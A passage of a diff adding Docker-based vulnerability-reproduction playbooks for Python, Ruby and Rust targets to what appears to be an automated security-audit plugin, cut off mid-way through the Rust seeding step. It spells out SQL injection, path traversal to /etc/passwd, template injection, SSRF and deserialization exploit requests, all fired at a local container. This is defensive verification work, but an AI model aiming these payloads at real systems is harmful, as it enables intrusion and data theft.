+Pick the Python tag from step 1 (fall back to a recent stable, e.g.
+`python:3.12-slim`). Build deps cover native wheels (`psycopg2`, `cryptography`,
+`lxml`, `mysqlclient`, `Pillow`).
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM python:3.12-slim
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      build-essential git curl libpq-dev libssl-dev libffi-dev \
+      libxml2-dev libxslt1-dev default-libmysqlclient-dev pkg-config \
+  && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+# Copy manifests first for layer caching (see Dependencies for which apply).
+COPY pyproject.toml requirements*.txt setup.py setup.cfg poetry.lock uv.lock \
+     Pipfile Pipfile.lock ./ 2>/dev/null || true
+RUN pip install --upgrade pip
+COPY . .
+RUN pip install -r requirements.txt 2>/dev/null \
+    || pip install . 2>/dev/null \
+    || true
+EXPOSE 8000
+# overridden at run time per framework (see below)
+CMD ["bash"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID -t $IMG .
+```
+
+> The `COPY ... 2>/dev/null || true` line is shell shorthand, not valid Dockerfile
+> syntax — `COPY` takes no redirection or `||`. Delete it before building: `COPY . .`
+> plus the dependency restore from §4 suffices; the split-copy is only a caching nicety.
+
+Start command depends on the framework (set host `PORT`, bind to `0.0.0.0`):
+
+- **Django:** `python manage.py runserver 0.0.0.0:8000`
+  (set `DJANGO_SETTINGS_MODULE` if non-default; provide a dummy
+  `SECRET_KEY=$(openssl rand -hex 32)` and `DEBUG=1` / `ALLOWED_HOSTS=*` so it
+  boots in dev). Production WSGI: `gunicorn <proj>.wsgi:application -b 0.0.0.0:8000`.
+- **Flask:** `flask --app app run --host 0.0.0.0 --port 8000`
+  (or `gunicorn 'app:app' -b 0.0.0.0:8000` / `python app.py` if it self-serves).
+- **FastAPI:** `uvicorn app.main:app --host 0.0.0.0 --port 8000`
+  (substitute the real `module:app` path).
+- **Library / CLI (no server):** there is nothing to serve — go to Fallbacks and
+  drive the vulnerable API from a unit test (`method: unit-test`).
+
+---
+
+## 4. Dependencies
+
+Restore from the project's lockfile/manifest — do **not** upgrade, that changes
+the audited dependency set. Inside the container (or in the build):
+
+```sh
+# pip + requirements (most common):
+pip install -r requirements.txt          # add -r requirements-dev.txt if the PoC needs it
+
+# editable install of the package itself (for libraries / console_scripts):
+pip install -e .
+
+# poetry (lockfile present):
+pip install poetry && poetry install --no-interaction --no-root
+
+# uv (fast; lockfile present):
+pip install uv && uv sync --frozen        # --frozen honors uv.lock exactly
+
+# pipenv:
+pip install pipenv && pipenv install --deploy --system   # --deploy honors Pipfile.lock
+```
+
+- Honor the lockfile exactly. Avoid `pip install -U`, `poetry update`, or
+  `uv lock`.
+- Native wheel build failures → install the matching `-dev` lib (see 3b:
+  `libpq-dev`, `libssl-dev`, `libffi-dev`, `libxml2-dev`/`libxslt1-dev`,
+  `default-libmysqlclient-dev`).
+- Prefer a venv-free container install (the image is disposable). If the project
+  hard-requires a venv, `python -m venv /venv && . /venv/bin/activate` first.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8000 \
+  -e SECRET_KEY=$(openssl rand -hex 32) -e DEBUG=1 -e ALLOWED_HOSTS='*' \
+  $IMG python manage.py runserver 0.0.0.0:8000
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port and the start command per framework (Django/FastAPI/gunicorn
+default **8000**; `flask run` defaults to **5000** unless `--port` is set).
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common ports inside the container: Django/FastAPI/gunicorn **8000**, Flask dev
+server **5000**. A 404 at `/` still means the server is up, but `curl -f` fails
+on 4xx/5xx: drop `-f`, poll a 2xx route, or check `docker logs` for the "listening" line.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Django DB:** migrate, then create a throwaway user inside the container:
+
+  ```sh
+  docker exec $CN python manage.py migrate --noinput
+  docker exec $CN python manage.py shell -c \
+    'from django.contrib.auth import get_user_model as g; U=g(); \
+     U.objects.filter(username="poc").exists() or \
+     U.objects.create_user("poc","poc@local.test","Poc-Passw0rd!")'
+  # superuser variant if the PoC needs admin:
+  docker exec $CN sh -c 'DJANGO_SUPERUSER_PASSWORD=Poc-Passw0rd! \
+     python manage.py createsuperuser --noinput --username poc --email poc@local.test' \
+     2>/dev/null || true
+  ```
+
+- **Flask / FastAPI:** there is no universal ORM/seed CLI. Seed via the app's
+  own DB layer in a one-off exec, e.g.:
+
+  ```sh
+  docker exec $CN python -c \
+    'from app import db, User; db.create_all(); \
+     db.session.add(User(email="poc@local.test", password="Poc-Passw0rd!")); \
+     db.session.commit()'
+  ```
+
+  (substitute the real models/session import; if the app seeds on first boot or
+  via a fixture/`flask db upgrade`, use that instead).
+
+- **Auth flow:** if the PoC needs a session, log in via the app's own login
+  endpoint with the seeded creds and keep the cookie jar:
+
+  ```sh
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -d 'username=poc&password=Poc-Passw0rd!' \
+    "http://127.0.0.1:$PORT/login"          # Django needs the CSRF token too — see §7
+  ```
+
+  Token-auth APIs (DRF/FastAPI): POST creds to the token endpoint, capture the
+  returned token, send it as `Authorization: Bearer <tok>` / `Token <tok>`.
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQLi / injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / file read — pull a container-local file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# SSTI (Jinja2/Django templates) — prove evaluation with arithmetic, then escalate:
+curl -s "http://127.0.0.1:$PORT/render?name=%7B%7B7*7%7D%7D" | grep -o 49
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN python -m http.server 9999      # canary in-container
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Insecure deserialization (pickle/yaml.load) / RCE — prove code exec by a
+# benign in-container side effect (touch a sentinel), then read it back:
+curl -s --data-binary @/tmp/payload.$FID "http://127.0.0.1:$PORT/<sink>"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# Django POST needs the CSRF token — fetch it from the form/cookie first:
+TOKEN=$(curl -s -c /tmp/jar.$FID "http://127.0.0.1:$PORT/login" \
+  | grep -oP 'csrfmiddlewaretoken" value="\K[^"]+')
+curl -s -b /tmp/jar.$FID -c /tmp/jar.$FID \
+  -d "csrfmiddlewaretoken=$TOKEN&username=poc&password=Poc-Passw0rd!" \
+  "http://127.0.0.1:$PORT/login"
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, `49` from `7*7`, reflected script, 500 with traceback) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`; no outbound
+connections; no real data; side effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID /tmp/payload.$FID
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library/CLI, or web boot blocked):** drive the
+   vulnerable function directly with a Python snippet/test in the container.
+   Set `method: unit-test`.
+
+   ```sh
+   docker run --rm -v "$WT":/app -w /app $IMG \
+     python -c 'from the_pkg.mod import vuln_fn; \
+                out=vuln_fn("<payload>"); \
+                assert "<impact marker>" in str(out), out; print("PWNED", out)'
+   # or, if a suite exists: pytest tests/test_<focused>.py -x -q
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/migrations, native
+   wheel):** record that the dependency set installs and the vulnerable code is
+   present and reachable, with the source→sink trace as evidence. Set
+   `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input plus the line-referenced source→sink path showing why
+   it triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/ruby.md b/plugins/security/prompts/playbooks/ruby.md
new file mode 100644
index 0000000..f7a2446
--- /dev/null
+++ b/plugins/security/prompts/playbooks/ruby.md
@@ -0,0 +1,265 @@
+# ENV Playbook — Ruby
+
+Build, run, and exploit a Ruby target (Rails / Sinatra / Rack / plain gem) to
+reproduce a candidate finding with a real PoC. Docker-first; the native Ruby
+toolchain may be absent on the host. Keep ALL traffic inside the local
+container — no external hosts, no real credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls Gemfile Gemfile.lock *.gemspec config.ru Rakefile 2>/dev/null
+find . -maxdepth 3 -name '*.rb' | head
+```
+
+- **Manifests:** `Gemfile` / `Gemfile.lock` (Bundler), `*.gemspec` (a gem),
+  `config.ru` (Rack rackup entrypoint).
+- **Framework tells:**
+  - Rails → `config/application.rb`, `bin/rails`, `app/`, `gem 'rails'`.
+  - Sinatra → `gem 'sinatra'`, `require 'sinatra'`.
+  - Rack/other → `config.ru` only, or a `*.gemspec` library with no web server.
+- **Ruby version:** `.ruby-version`, `.tool-versions`, the `ruby` directive in
+  `Gemfile`, or `required_ruby_version` in `*.gemspec`. Match the image to it.
+
+```sh
+cat .ruby-version 2>/dev/null; grep -E "^\s*ruby ['\"]" Gemfile 2>/dev/null
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, and
+migrations for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Ruby tag from step 1 (fall back to a recent stable, e.g.
+`ruby:3.3-slim`). Build deps cover native gems (`pg`, `nokogiri`, `sqlite3`);
+for `mysql2` also add `default-libmysqlclient-dev` to the apt list.
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM ruby:3.3-slim
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      build-essential git curl libpq-dev libsqlite3-dev libyaml-dev pkg-config \
+  && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+COPY Gemfile* *.gemspec ./
+RUN gem install bundler && (bundle install --jobs 4 || true)
+COPY . .
+RUN bundle install --jobs 4
+EXPOSE 3000
+# overridden at run time per framework (see below)
+CMD ["bash"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID -t $IMG .
+```
+
+Start command depends on the framework (set host `PORT`, bind app to `0.0.0.0`):
+
+- **Rails:** `bundle exec rails server -b 0.0.0.0 -p 3000`
+  (set `RAILS_ENV=development` and a dummy `SECRET_KEY_BASE=$(openssl rand -hex 32)`).
+- **Rack/Sinatra w/ `config.ru`:** `bundle exec rackup -o 0.0.0.0 -p 3000`
+- **Sinatra single file:** `bundle exec ruby app.rb -o 0.0.0.0 -p 4567`
+  (Sinatra classic default port is 4567).
+- **Library gem (no server):** there is nothing to serve — go to Fallbacks and
+  drive the vulnerable API from a unit test (`method: unit-test`).
+
+---
+
+## 4. Dependencies
+
+Inside the container (or in the build), Bundler restores from the lockfile:
+
+```sh
+bundle install --jobs 4 --retry 3
+```
+
+- Honor `Gemfile.lock` exactly; do **not** `bundle update` (that changes the
+  audited dependency set).
+- Native gem build failures → ensure the matching `-dev` lib is installed
+  (see 3b: `libpq-dev`, `libsqlite3-dev`, `libyaml-dev`, etc.).
+- Rails apps may need assets/secrets to boot: precompile is usually skippable in
+  dev; if it insists, `RAILS_ENV=development` avoids prod asset/secret checks.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:3000 \
+  -e RAILS_ENV=development -e SECRET_KEY_BASE=$(openssl rand -hex 32) \
+  $IMG bundle exec rails server -b 0.0.0.0 -p 3000
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port (`:3000` / `:4567`) and the start command per framework.
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common ports inside the container: Rails/rackup **3000**, Sinatra classic
+**4567**. WEBrick/Puma both honor `-p`.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Rails DB:** create/migrate, then seed a throwaway user inside the container:
+
+  ```sh
+  docker exec $CN bundle exec rails db:create db:schema:load 2>/dev/null \
+    || docker exec $CN bundle exec rails db:create db:migrate
+  docker exec $CN bundle exec rails runner \
+    'u=User.new(email:"poc@local.test"); u.password="Poc-Passw0rd!" if u.respond_to?(:password=); u.save!(validate:false) rescue nil'
+  ```
+
+- **Auth flow:** if the PoC needs a session, log in via the app's own login endpoint
+  with the seeded creds and keep the cookie jar (Rails CSRF: also post `authenticity_token`):
+
+  ```sh
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -d 'email=poc@local.test&password=Poc-Passw0rd!' \
+    "http://127.0.0.1:$PORT/login"
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQLi / injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / file read — pull a container-local file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN ruby -run -e httpd . -p 9999    # canary in-container (Ruby >= 3.0 needs the webrick gem)
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Deserialization / RCE — prove code exec by a benign in-container side effect
+# (e.g. touch a sentinel file), then read it back; do NOT run destructive cmds:
+curl -s --data-binary @/tmp/payload.$FID "http://127.0.0.1:$PORT/<sink>"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, 500 with stack) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`; no outbound
+connections; no real data; side effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID /tmp/payload.$FID
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library gem, or web boot blocked):** drive the
+   vulnerable method directly with a Ruby test in the container. Set
+   `method: unit-test`.
+
+   ```sh
+   docker run --rm -v "$WT":/app -w /app $IMG \
+     ruby -Ilib -e 'require "the_lib"; <call vulnerable API with payload>; <assert impact>'
+   # or, if specs exist: bundle exec rspec spec/<focused>_spec.rb
+   ```
+
+2. **Image builds but the app can't start (missing DB/config, native gem):**
+   record that the dependency set installs and the vulnerable code is present
+   and reachable, with the source→sink trace as evidence. Set
+   `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input plus the line-referenced source→sink path showing why
+   it triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/rust.md b/plugins/security/prompts/playbooks/rust.md
new file mode 100644
index 0000000..9853b26
--- /dev/null
+++ b/plugins/security/prompts/playbooks/rust.md
@@ -0,0 +1,458 @@
+# ENV Playbook — Rust
+
+Build, run, and exploit a Rust target (actix-web / axum / rocket / warp / hyper,
+or a plain CLI / library crate) to reproduce a candidate finding with a real
+PoC. Docker-first; the native Rust toolchain may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls Cargo.toml Cargo.lock rust-toolchain rust-toolchain.toml Dockerfile docker-compose.yml 2>/dev/null
+find . -maxdepth 3 -name '*.rs' -not -path '*/target/*' | head
+```
+
+- **Manifests:** `Cargo.toml` (always). It declares the crate `name`, the
+  `edition` (2015/2018/2021/2024), `[dependencies]`, and whether it is a binary
+  (`[[bin]]` / `src/main.rs`), a library (`[lib]` / `src/lib.rs`), or a
+  **workspace** (`[workspace]` with a `members = [...]` list — multiple crates).
+  `Cargo.lock` pins exact dependency versions (committed for binaries; honor it).
+- **Toolchain version:** `rust-toolchain.toml` or `rust-toolchain` pins the
+  exact `channel` (e.g. `1.79.0`, `stable`, `nightly`). Match the image tag to
+  it — a crate using newer syntax/edition will fail on an older `rustc`.
+- **Binary vs library:** `src/main.rs` (or `[[bin]]`) is a runnable binary;
+  `src/lib.rs` (or `[lib]` with no bin) is a library with nothing to serve →
+  Fallbacks, drive the sink from a `#[test]`.
+
+  ```sh
+  ls src/main.rs src/lib.rs 2>/dev/null
+  find . -maxdepth 4 -path '*/src/main.rs' -not -path '*/target/*'   # workspace bins
+  grep -nE '^\s*(edition|name)\s*=' Cargo.toml
+  cat rust-toolchain.toml rust-toolchain 2>/dev/null
+  ```
+
+- **Framework tells** (read `[dependencies]` in `Cargo.toml`, or `use` imports):
+  - **actix-web** → `actix-web`; `HttpServer::new(...).bind(...)`. Default bind
+    in examples is `127.0.0.1:8080`.
+  - **axum** → `axum` (+ `tokio`, `hyper`, `tower`); `axum::serve` /
+    `Server::bind`. Commonly `0.0.0.0:3000`.
+  - **rocket** → `rocket`; `#[launch]` / `rocket::build()`. Default `8000`,
+    binds `127.0.0.1` unless `ROCKET_ADDRESS=0.0.0.0`.
+  - **warp** → `warp`; `warp::serve(...).run((addr, port))`.
+  - **hyper / tower** (low-level) → `hyper`, `tower`. **tonic** → gRPC over
+    `tonic` (+ `prost`, a `build.rs`, `.proto` files); default `50051`.
+  - **Async runtime** is almost always `tokio` (`#[tokio::main]`); `async-std`
+    is the alternative.
+  - Library / CLI (no server crate, no `bind`/`serve`) → nothing to serve; go to
+    Fallbacks and drive the sink from a test.
+- **The bind address is ground truth.** Find the port and bind address — you must
+  map and bind exactly what the code listens on:
+
+  ```sh
+  grep -rnE '\.bind\(|::bind|serve\(|TcpListener::bind|"0\.0\.0\.0|"127\.0\.0\.1|:[0-9]{2,5}"' \
+    --include='*.rs' . | grep -v /target/ | head
+  ```
+
+  Note whether it binds `0.0.0.0:8080` (all interfaces, mappable) vs
+  `127.0.0.1:8080` (loopback only — see Run & health-check for how to still
+  reach it). Many apps read the addr from env (`HOST`/`PORT`/`BIND_ADDR`,
+  `ROCKET_ADDRESS`/`ROCKET_PORT`) — prefer overriding that to `0.0.0.0`.
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Never copy a host `target/` dir into the build — it is huge and may carry
+host-native artifacts and stale state. Keep it (and `.git`) out of the build
+context so the container compiles fresh:
+
+```sh
+printf '\ntarget\n.git\n**/*.rs.bk\n' >> /tmp/va-$FID/.dockerignore   # docker reads it only from the context root
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up the build profile,
+env, DB, and the correct entry binary for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Rust tag from `rust-toolchain.toml` / the `edition` in `Cargo.toml`
+(edition 2024 needs `rust:1.85` or newer; otherwise fall back to a recent stable, e.g.
+`rust:1.79-bookworm`). A multi-stage build compiles in the SDK image and runs the binary in a small Debian base.
+
+**Build a debug profile, not `--release`** — release LTO compiles are slow and
+the audit cares about behavior, not perf. Copy manifests first so the (slow)
+dependency compile is cached separately from the source.
+
+```sh
+# Resolve the binary crate name (default to the package name in Cargo.toml):
+BIN=$(grep -m1 -E '^\s*name\s*=' Cargo.toml | sed -E 's/.*"([^"]+)".*/\1/')
+
+cat > /tmp/Dockerfile.$FID <<EOF
+FROM rust:1.79-bookworm AS build
+WORKDIR /src
+# Copy manifests first for dependency-layer caching.
+COPY Cargo.toml ./
+COPY Cargo.lock* ./
+# Pre-compile deps against a stub main so editing source doesn't refetch/rebuild
+# the whole dependency graph. (cargo-chef does this more robustly if available.)
+RUN mkdir -p src && echo 'fn main(){}' > src/main.rs \
+ && (cargo build || true) && rm -rf src
+COPY . .
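+# Touch sources so cargo rebuilds over the stub artifact (COPY keeps old mtimes); debug profile — faster than --release.
+RUN find . -name '*.rs' -not -path './target/*' -exec touch {} + ; cargo build --locked --bins || cargo build --bins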
+# Stage the produced binary out of target/debug.
+RUN cp "target/debug/$BIN" /out_app 2>/dev/null \
+ || cp "\$(find target/debug -maxdepth 1 -type f -executable ! -name '*.d' | head -1)" /out_app
+
+FROM debian:12-slim
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      ca-certificates curl libssl3 \
+  && rm -rf /var/lib/apt/lists/*
+COPY --from=build /out_app /app
+EXPOSE 8080
+ENTRYPOINT ["/app"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid -t $IMG "$WT"
+```
+
+`--locked` forces the build to honor `Cargo.lock` exactly (errors if it would
+change) — important for auditing the pinned dependency set. The fallback drops
+it for the rare repo with a stale/absent lock.
+
+If the runtime needs the toolchain present (e.g. to run tests, or to recompile
+for a Fallback), or the binary needs shell tooling for a PoC sentinel, just run
+straight from the `rust` image with the worktree mounted read-only:
+
+```sh
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 -w /src -v "$WT":/src:ro \
+  -e CARGO_TARGET_DIR=/tmp/target rust:1.79-bookworm \
+  sh -c "cargo build --locked && exec /tmp/target/debug/$BIN"
+# NOTE: a :ro mount can't write target/, hence CARGO_TARGET_DIR points outside the mount.
+```
+
+Start command, by how the project runs (the binary must bind `0.0.0.0` /
+`:PORT`, not `127.0.0.1`, or the mapped host port can't reach it):
+
+- **Single server binary:** the built `/app` is the entry (the `ENTRYPOINT`
+  above). Pass config via flags/env at run time.
+- **Workspace with multiple bins:** build/run the specific one
+  (`cargo build -p <crate> --bin <name>`) — pick the server, not a migrator/CLI.
+- **Reads bind addr from env:** pass it. actix/axum often read `HOST`/`PORT` or
+  a `BIND_ADDR`; rocket reads `ROCKET_ADDRESS` / `ROCKET_PORT`. Force
+  `0.0.0.0` so the mapped port is reachable.
+- **Library / CLI only:** nothing to serve → Fallbacks, `method: unit-test`.
+
+---
+
+## 4. Dependencies
+
+Restore reproducibly; `Cargo.lock` pins exact versions and Cargo verifies crate
+checksums against it:
+
+```sh
+cargo fetch --locked     # download every locked dependency into the registry cache
+cargo build --locked     # compile honoring Cargo.lock exactly (no version drift)
+```
+
+- Do **not** `cargo update` / bump versions — that changes the audited
+  dependency set. `--locked` errors if a build would mutate `Cargo.lock`;
+  `--offline` builds entirely from the cache once fetched.
+- **Native / `*-sys` crates** (e.g. `openssl-sys`, `libpq`/`pq-sys`,
+  `rdkafka-sys`) link C libraries and need dev headers + `pkg-config` at build
+  time. The `rust:bookworm` image has `gcc`/`pkg-config`; add the specific lib,
+  e.g. `apt-get install -y libssl-dev libpq-dev`. The runtime base then needs
+  the shared lib (`libssl3`, `libpq5`).
+- **Vendored deps:** a `.cargo/config.toml` with `[source.crates-io]` replaced by
+  a `vendor/` directory means deps are checked in — build offline, no network.
+- **Private registries / git deps with auth:** if a dep path can't resolve it
+  likely needs credentials — out of scope; do not supply real secrets. Note it
+  and fall back if the build blocks.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 \
+  -e HOST=0.0.0.0 -e PORT=8080 -e BIND_ADDR=0.0.0.0:8080 \
+  -e ROCKET_ADDRESS=0.0.0.0 -e ROCKET_PORT=8080 \
+  $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Map the
+container port (`:8080`) to whatever the code actually listens on (read the
+`.bind(...)` / `serve` arg — common defaults: actix **8080**, axum **3000**,
+rocket **8000**, warp varies, tonic/gRPC **50051**).
+
+**If the app binds `127.0.0.1` inside the container** (hardcoded, not from env),
+a `-p` map can't reach it (loopback is per-namespace). Either fire the PoC from
+inside the container (`docker exec $CN ...` — the `debian:12-slim` runtime has a
+shell; install `curl` if missing), or run with `--network host` on Linux so the
+container's loopback is the host's:
+
+```sh
+docker run -d --name $CN --network host $IMG    # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -sS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+A 404 on `/` still means the server is up — any TCP/HTTP response counts as
+healthy. Look for the framework boot line in the logs (actix `starting N
+workers` / `Starting "actix-web-service-..."`, axum/tokio nothing by default —
+add `RUST_LOG=debug` and look for tower/hyper accept logs, rocket's `Rocket has
+launched from http://...` banner). For a **tonic/gRPC** target, plain `curl`
+won't health-check it; probe with `grpcurl` (see Fire the PoC). Setting
+`-e RUST_LOG=debug -e RUST_BACKTRACE=1` makes boot failures and panics legible.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** check for a migrations dir and the tool in use — `sqlx`
+  (`migrations/`, `sqlx migrate run`), `diesel` (`migrations/`,
+  `diesel migration run` / `diesel_migrations` embedded at boot), `sea-orm`
+  (`migration/` crate). Run it inside the container:
+
+  ```sh
+  docker exec $CN sh -c 'sqlx migrate run 2>/dev/null \
+    || diesel migration run 2>/dev/null \
